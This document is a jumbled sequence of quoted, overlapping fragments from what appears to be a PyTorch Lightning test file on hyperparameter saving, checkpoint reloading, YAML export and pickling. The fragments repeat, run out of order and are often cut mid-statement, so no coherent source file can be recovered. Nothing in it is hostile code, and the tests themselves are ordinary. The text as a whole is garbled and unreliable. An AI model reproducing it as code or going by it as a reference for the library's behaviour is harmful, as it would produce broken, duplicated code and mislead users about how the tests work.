checkpoint saved the properties raw_checkpoint_path = _raw_checkpoint_path(trainer)", "assert model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests that a", "the properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY", "# model = cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg == 42 class", "model = LocalModel() assert model.hparams.batch_size == 15 # verify that", "def __init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel() assert model.hparams.batch_size", "assert model2.hparams.test_arg == 14 assert model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir):", "**kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\" Test for inheritance: super", "os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') == 123 class", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) with pytest.raises(TypeError,", "# # # verify that model loads correctly # raw_checkpoint_path", "(the \"License\"); # you may not use this file except", "model2.hparams.test_arg == 14 assert model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir): \"\"\"", "a model can take regular args and assign \"\"\" #", "'test_arg2' not in model.hparams # test_arg2 is not registered in", "assigned # assert model.hparams.my_arg == 42 # # # verify", "is not registered in class init return raw_checkpoint_path # -------------------------", "self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90) # run standard test suite", "raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size']", "are always nn.Module a = MyModule() assert isinstance(a, torch.nn.Module) def", "= cls() trainer = Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader =", "raw_checkpoint_path = _raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\) got an unexpected keyword", "Container) # config specific tests assert model2.hparams.test_arg == 14 assert", "assert model.hparams.test_arg2 == 120 def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that a", "= Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model) path_yaml", "A: def test(self): a = MyModule() _ = a.hparams def", "def test_collect_init_arguments(tmpdir, cls): \"\"\" Test that the model automatically saves", "model = cls(running_arg=123) assert model.hparams.running_arg == 123 model.hparams.running_arg = -1", "in model.hparams def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123,", "# Copyright The PyTorch Lightning team. # # Licensed under", "from torch.nn import functional as F from torch.utils.data import DataLoader", "def __init__(self, hparams): super().__init__() self._hparams = None # pretend EvalModelTemplate", "# # Unless required by applicable law or agreed to", "torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size'] = -17", "can take an object with explicit setter \"\"\" def __init__(self,", "can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # make sure", "hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert", "that cannot be pickled. \"\"\" def __init__(self, foo='bar', pickle_me=(lambda x:", "train=True, download=True), batch_size=32) trainer.fit(model, train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True),", "we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # make", "verify that model loads correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size", "A model that has unconventional names for \"self\", \"*args\" and", "model.hparams.batch_size == 15 # verify that the checkpoint saved the", "and \"**kwargs\". \"\"\" def __init__(obj, *more_args, other_arg=300, **more_kwargs): # intentionally", "\"\"\"Test that the model takes only valid class arguments.\"\"\" class", "implied. # See the License for the specific language governing", "__init__(self, my_path, any_param=123): super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir))", "DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert model.hparams.batch_size == 32 model", "super().__init__(**kwargs) assert not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel()", "UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that has an attribute that cannot", "not in model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams): super().__init__() self._hparams", "test_implicit_args_hparams(tmpdir): \"\"\" Tests that a model can take regular args", "model.hparams.test_arg == 14 assert 'test_arg2' not in model.hparams # test_arg2", "a model can take an object with explicit setter \"\"\"", "automatically saves the arguments passed into the constructor \"\"\" extra_args", "# config specific tests assert model2.hparams.test_arg == 14 assert model2.hparams.mylist[0]", "did not call self.save_hyperparameters() self.hparams = hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\"", "unsupported config type. \"\"\" with pytest.raises(ValueError): _ = cls(**config) @pytest.mark.parametrize(\"past_key\",", "14 # verify that model loads correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path)", "assert raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return", "model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container) # config specific tests", "assert model.hparams.test_arg == 14 assert 'test_arg2' not in model.hparams #", "[ # (SaveHparamsModel, Namespace(my_arg=42)), # (SaveHparamsModel, dict(my_arg=42)), # (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))),", "define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg')", "F from torch.utils.data import DataLoader from pytorch_lightning import Trainer, LightningModule", "test(self): a = MyModule() _ = a.hparams def test2(self): test_outside()", "model = EvalModelTemplate() # verify we can train trainer =", "model.hparams.running_arg == 123 model.hparams.running_arg = -1 assert model.hparams.running_arg == -1", "42 trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, )", "AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir, cls): \"\"\" Test that", "SimpleNoArgsModel(LightningModule): def __init__(self): super().__init__() self.l1 = torch.nn.Linear(28 * 28, 10)", "OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [", "== pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert ad == pickle.loads(pkl) class", "# verify that model loads correctly # raw_checkpoint_path = _raw_checkpoint_path(trainer)", "**kwargs) # this is intentionally here at the end class", "loads correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg == 14 assert", "14 # verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1,", "from torch.utils.data import DataLoader from pytorch_lightning import Trainer, LightningModule from", "179 if isinstance(model, SubClassEvalModel): assert model.hparams.subclass_arg == 1200 if isinstance(model,", "assert isinstance(model2.hparams, Container) # config specific tests assert model2.hparams.test_arg ==", "_raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\) got an unexpected keyword argument 'test'\"):", "cls): \"\"\"Test models that do not tae any argument in", "self.save_hyperparameters() model = LocalModel() assert model.hparams.batch_size == 15 # verify", "existence of an arg 'test_arg=14' \"\"\" hparam_type = type(model.hparams) #", "raw_checkpoint[past_key]['batch_size'] = -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back the checkpoint", "trainer = Trainer(default_root_dir=tmpdir, max_steps=1) with pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed from", "Unless required by applicable law or agreed to in writing,", "test_arg2=90) # test proper property assignments assert model.hparams.test_arg == 14", "train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir):", "= cls(**extra_args) assert model.hparams.batch_size == 32 model = cls(batch_size=179, **extra_args)", "LocalModel() assert model.hparams.batch_size == 15 # verify that the checkpoint", "= DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model, train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(),", "99 def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths =", "the specific language governing permissions and # limitations under the", "train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model, train_loader) test_loader =", "test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test", "the arguments passed into the constructor \"\"\" extra_args = {}", "verify that we can overwrite whatever we want model =", "'local_var' not in model.hparams assert model.hparams['arg1'] == 'overwritten' assert model.hparams['arg2']", "super().__init__() self.hparams = hparams # ------------------------- # STANDARD TESTS #", "values trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # verify that we", "== 99 def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths", "assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams", "== 42 class AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class", "def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90)", "forward(self): ... # make sure PL modules are always nn.Module", "model.hparams['arg1'] == 'overwritten' assert model.hparams['arg2'] == 2 # @pytest.mark.parametrize(\"cls,config\", [", "== -17 def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1, 'key2': 'abc'})", "load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml,", "a model can take an object \"\"\" def __init__(self, hparams):", "MyModule() _ = a.hparams class A: def test(self): a =", "= -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back the checkpoint torch.save(raw_checkpoint,", "# init model model = cls(hparams=Namespace(test_arg=14)) # run standard test", "# make sure the raw checkpoint saved the properties raw_checkpoint_path", "super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90) # test proper property", "'anything' # verify that we can overwrite whatever we want", "self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that has unconventional names", "= Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) # make sure the raw", "OmegaConf, Container from torch.nn import functional as F from torch.utils.data", "isinstance(model2.hparams, hparam_type) if try_overwrite: # verify that we can overwrite", "NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__() class SimpleNoArgsModel(LightningModule): def __init__(self): super().__init__() self.l1", "load_hparams_from_yaml from pytorch_lightning.utilities import AttributeDict, is_picklable from tests.base import EvalModelTemplate,", "that a model can take an object \"\"\" def __init__(self,", "varargs. \"\"\" hparams = dict(test=1) model = SubClassVarArgs(hparams) trainer =", "def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [", "class OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\",", "def test_explicit_args_hparams(tmpdir): \"\"\" Tests that a model can take implicit", "loads correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg == 14", "assignments assert model.hparams.test_arg == 14 # verify we can train", "verify that model loads correctly model = cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size", "def test2(self): test_outside() test_outside() A().test2() A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss =", "assert 'pickle_me' not in model.hparams def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32,", "== hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams))", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # verify that we can", "class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters()", "# pretend EvalModelTemplate did not call self.save_hyperparameters() self.hparams = hparams", "------------------------- # STANDARD TESTS # ------------------------- def _run_standard_hparams_test(tmpdir, model, cls,", "= Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) # make sure the raw", "]) def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that do not tae", "@pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def", "model.hparams.abc == 42 trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2,", "'key2': 'abc'}) pkl = pickle.dumps(ad) assert ad == pickle.loads(pkl) pkl", "Tests that a model can take regular args and assign", "STANDARD TESTS # ------------------------- def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False): \"\"\"", "------------------------- # SPECIFIC TESTS # ------------------------- def test_class_nesting(): class MyModule(LightningModule):", "EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1':", "tests assert model2.hparams.test_arg == 14 assert model2.hparams.mylist[0] == 15.4 def", "loss = F.cross_entropy(self(x), y) return {'loss': loss, 'log': {'train_loss': loss}}", "DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model, train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False,", "= DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that", "not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer =", "{'loss': loss, 'log': {'train_loss': loss}} def test_step(self, batch, batch_nb): x,", "SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that do", "torch.save(raw_checkpoint, raw_checkpoint_path) # verify that model loads correctly model2 =", "config): \"\"\" Test fail on passing unsupported config type. \"\"\"", "from omegaconf import OmegaConf, Container from torch.nn import functional as", "model3.hparams.test_arg == 78 return raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir,", "set arg1 = 'overwritten' local_var = 1234 super().__init__(*args, **kwargs) #", "class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg', 'test_arg2') model", "cloudpickle.dumps(ad) assert ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model", "**kwargs): super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir,", "init in the super class \"\"\" def __init__(self, *args, **kwargs):", "runtime change allowed\"\"\" model = cls(running_arg=123) assert model.hparams.running_arg == 123", "isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] == 'anything' # verify that we", "overfit_batches=0.5) # trainer.fit(model) # # # verify that model loads", "assert model.hparams.batch_size == 15 # verify that the checkpoint saved", "= 1234 super().__init__(*args, **kwargs) # this is intentionally here at", "names for \"self\", \"*args\" and \"**kwargs\". \"\"\" def __init__(obj, *more_args,", "@pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls): # init model conf", "fsspec.implementations.local import LocalFileSystem from omegaconf import OmegaConf, Container from torch.nn", "Container) # run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model,", "that we can overwrite whatever we want raw_checkpoint_path = _raw_checkpoint_path(trainer)", "cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container) # config specific tests assert model2.hparams.test_arg", ") train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model, train_loader) test_loader", "You may obtain a copy of the License at #", "that we can overwrite the property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78)", "*args, **kwargs): self.argument1 = arg1 # arg2 intentionally not set", "model, LocalModel) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) # config specific tests", "from pytorch_lightning.utilities import AttributeDict, is_picklable from tests.base import EvalModelTemplate, TrialMNIST,", "in class init return raw_checkpoint_path # ------------------------- # SPECIFIC TESTS", "A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss = torch.nn.CrossEntropyLoss() def __init__(self, *args, subclass_arg=1200,", "== 123 model.hparams.running_arg = -1 assert model.hparams.running_arg == -1 model.hparams", "cloudpickle import pytest import torch from fsspec.implementations.local import LocalFileSystem from", "raw_checkpoint_path) return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model has the", "**kwargs) self.argument1 = arg1 # arg2 intentionally not set arg1", "Tests that only the arguments are collected and not local", "self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ])", "max_epochs=1, ) trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml)", "LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14,", "= cls(hparams={'test_arg': 14}) # run standard test suite _run_standard_hparams_test(tmpdir, model,", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls): # init model conf = OmegaConf.create(dict(test_arg=14,", "that a model can take regular args and assign \"\"\"", "def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that a model can take regular", "1, 'key2': 'abc'}) pkl = pickle.dumps(ad) assert ad == pickle.loads(pkl)", "model.hparams.dict_conf['my_param'] == 'anything' # verify that we can overwrite whatever", "dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls, config): \"\"\" Test fail", "and # limitations under the License. import os import pickle", "= pickle.dumps(ad) assert ad == pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert", "test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel) model = LocalModel.load_from_checkpoint(raw_checkpoint_path,", "[SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls): # init model conf =", "raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model has the super().__init__() call", "the correct values # trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) #", "do it, it should be assigned # assert model.hparams.my_arg ==", "saved the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model)", "__init__(self, foo='bar', pickle_me=(lambda x: x + 1), **kwargs): super().__init__(**kwargs) assert", "local_var = 1234 super().__init__(*args, **kwargs) # this is intentionally here", "= _run_standard_hparams_test(tmpdir, model, cls) model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container)", "super().__init__() self.l1 = torch.nn.Linear(28 * 28, 10) def forward(self, x):", "arg2, *args, **kwargs): self.argument1 = arg1 # arg2 intentionally not", "obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs)", "standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel) model =", "learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams)", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class", "model.hparams.batch_size == 179 if isinstance(model, SubClassEvalModel): assert model.hparams.subclass_arg == 1200", "# model = cls(config) # # # no matter how", "# (AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), #", "License. # You may obtain a copy of the License", "model has the super().__init__() call at the end. \"\"\" def", "max_epochs=2, overfit_batches=0.5) # trainer.fit(model) # # # verify that model", "SubClassEvalModel(EvalModelTemplate): any_other_loss = torch.nn.CrossEntropyLoss() def __init__(self, *args, subclass_arg=1200, **kwargs): super().__init__(*args,", "overwrite whatever we want model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size", "**kwargs): super().__init__(*args, **kwargs) self.argument1 = arg1 # arg2 intentionally not", "def test_class_nesting(): class MyModule(LightningModule): def forward(self): ... # make sure", "= torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14", "not set arg1 = 'overwritten' local_var = 1234 super().__init__(*args, **kwargs)", "init.\"\"\" model = cls() trainer = Trainer( max_epochs=1, default_root_dir=tmpdir, )", "test_collect_init_arguments(tmpdir, cls): \"\"\" Test that the model automatically saves the", "isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that the checkpoint saved the correct", "_auto_collect_arguments() call at the end. \"\"\" def __init__(self, arg1, arg2,", "max_steps=1) with pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed from hparams because it", "model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls): # init", "def test_outside(): a = MyModule() _ = a.hparams class A:", "pkl = pickle.dumps(ad) assert ad == pickle.loads(pkl) pkl = cloudpickle.dumps(ad)", "y) return {'loss': loss, 'log': {'train_loss': loss}} def test_step(self, batch,", "== 120 def test_implicit_args_hparams(tmpdir): \"\"\" Tests that a model can", "raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 # verify that model loads", "model model = cls(hparams=Namespace(test_arg=14)) # run standard test suite _run_standard_hparams_test(tmpdir,", "take implicit args and assign \"\"\" # define model class", "here at the end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model has", "\"\"\" def __init__(self, arg1, arg2, *args, **kwargs): super().__init__(*args, **kwargs) self.argument1", "torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self, batch, batch_nb): x, y = batch", "train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) # make sure", "b=2)])) model = cls(hparams=conf) assert isinstance(model.hparams, Container) # run standard", "DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the", "suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120)", "AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args)", "super().__init__(*args, **kwargs) self.argument1 = arg1 # arg2 intentionally not set", "trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\) got an unexpected", "class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg') model =", "Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\) got", "def __init__(self, foo='bar', pickle_me=(lambda x: x + 1), **kwargs): super().__init__(**kwargs)", "model.hparams.running_arg == -1 model.hparams = Namespace(abc=42) assert model.hparams.abc == 42", "init model model = cls(hparams=Namespace(test_arg=14)) # run standard test suite", "an arg 'test_arg=14' \"\"\" hparam_type = type(model.hparams) # test proper", "class A: def test(self): a = MyModule() _ = a.hparams", "cls): \"\"\" Test that the model automatically saves the arguments", "SubClassEvalModel): assert model.hparams.subclass_arg == 1200 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss,", "dict(test=1) model = SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path", "cls(batch_size=179, **extra_args) assert model.hparams.batch_size == 179 if isinstance(model, SubClassEvalModel): assert", "Namespace(my_arg=42)), # (SaveHparamsModel, dict(my_arg=42)), # (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)),", "suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls) model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert", "checkpoint torch.save(raw_checkpoint, raw_checkpoint_path) # verify that model loads correctly model2", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "that the model takes only valid class arguments.\"\"\" class LocalModel(EvalModelTemplate):", "fail on passing unsupported config type. \"\"\" with pytest.raises(ValueError): _", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "for the specific language governing permissions and # limitations under", "hparams because it cannot be pickled\"): trainer.fit(model) assert 'pickle_me' not", "super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can", "# verify that model loads correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert", "= dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml')", "hparam_type) if try_overwrite: # verify that we can overwrite the", "return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def test_model_nohparams_train_test(tmpdir,", "# test proper property assignments assert model.hparams.test_arg == 14 #", "not registered in class init return raw_checkpoint_path # ------------------------- #", "cls(**extra_args) assert model.hparams.batch_size == 32 model = cls(batch_size=179, **extra_args) assert", "required by applicable law or agreed to in writing, software", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir, cls):", "__init__(self): super().__init__() class SimpleNoArgsModel(LightningModule): def __init__(self): super().__init__() self.l1 = torch.nn.Linear(28", "# # no matter how you do it, it should", "28, 10) def forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self,", "type(model.hparams) # test proper property assignments assert model.hparams.test_arg == 14", "\"\"\" Tests that a model can take implicit args and", "agreed to in writing, software # distributed under the License", "14 assert 'test_arg2' not in model.hparams # test_arg2 is not", "= _run_standard_hparams_test(tmpdir, model, LocalModel) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) # config", "def test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests that only the arguments are collected", "distributed under the License is distributed on an \"AS IS\"", "that model loads correctly # raw_checkpoint_path = _raw_checkpoint_path(trainer) # model", "cls): \"\"\"Test that we save/export only the initial hparams, no", "model.hparams = Namespace(abc=42) assert model.hparams.abc == 42 trainer = Trainer(", "test_class_nesting(): class MyModule(LightningModule): def forward(self): ... # make sure PL", "a.hparams class A: def test(self): a = MyModule() _ =", "assert isinstance(model2.hparams, hparam_type) if try_overwrite: # verify that we can", "= {} if cls is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls is", "from argparse import Namespace import cloudpickle import pytest import torch", "x in raw_checkpoint_paths if '.ckpt' in x] assert raw_checkpoint_paths raw_checkpoint_path", "are collected and not local variables. \"\"\" model = cls(arg1=1,", "no other runtime change allowed\"\"\" model = 